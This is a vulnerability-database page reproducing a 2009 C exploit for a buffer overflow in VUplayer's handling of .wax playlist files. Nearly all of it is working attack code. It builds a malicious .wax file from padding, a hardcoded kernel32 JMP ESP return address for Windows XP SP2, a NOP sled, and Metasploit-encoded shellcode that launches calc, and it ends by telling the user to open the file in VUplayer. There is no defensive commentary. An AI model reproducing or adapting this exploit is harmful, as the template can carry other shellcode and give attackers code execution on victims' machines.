Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21250
HistoryJan 28, 2009 - 12:00 a.m.

VUplayer (.wax file) local buffer overflow crash exploit

2009-01-2800:00:00
vulners.com
11
JSON

/* VUplayer (.wax file) local buffer overflow crash exploit

  •   By Assad edin - Moroccan Hackerz ( Mgharba Until Death ) - [email protected]

  •   Mgharba Bhjawa Msalmine : xCracker - Assad edin - Simo-s0ft .

  •   Special Thanks: All Moroccan & Muslims Hackers & Str0ke Ro7 T9Awd CHof li I7wik.

*/
#include<stdio.h>
#include<string.h>
#include<windows.h>
// unicode format
char header1[]=
"\x3c\x77\x61\x78\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x22"
"\x33\x2e\x30\x22\x20\x3e\x0d\x0d\x0d\x3c\x65\x6e\x74\x72\x79\x3e"
"\x0d\x0d\x0d\x3c\x74\x69\x74\x6c\x65\x3e\x43\x6f\x64\x65\x64\x20"
"\x42\x79\x20\x53\x69\x6d\x4f\x2d\x73\x30\x66\x54\x2e\x6d\x70\x33"
"\x3c\x2f\x74\x69\x74\x6c\x65\x3e\x0d\x0d\x0d\x3c\x72\x65\x66\x20"
"\x68\x72\x65\x66\x20\x3d\x09";

//win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
unsigned char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a";

char header2[]=
"\x2f\x3e\x0d\x3c\x2f\x65\x6e\x74\x72\x79\x3e\x0d\x3c\x2f\x77\x61"
"\x78\x3e";

int main(int argc,char *argv[])
{ FILE *openfile;
char exploit[1290];
char junk[925];
char ret[]="\x68\xD5\x85\x7C";// JMP kernel32.dll esp (Windows Trust SP2)
char nop[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
printf(" CoDEd By Ismail ==> marrakesh city");

memset(junk,0x41,925);
memcpy(exploit,junk,925);
memcpy(exploit+925,ret,strlen(ret));
memcpy(exploit+925+strlen(ret),nop,strlen(nop));
memcpy(exploit+925+strlen(ret)+strlen(nop),scode,343);

openfile=fopen("ismail.wax","wb");
if(openfile==NULL){ perror("ERROR…\n");}
fputs(header1,openfile);
fputs(exploit,openfile);
fputs(header2,openfile);
fclose(openfile);
printf("File created …!"
"open it whit VUplayer…!");
return 0;
}

JSON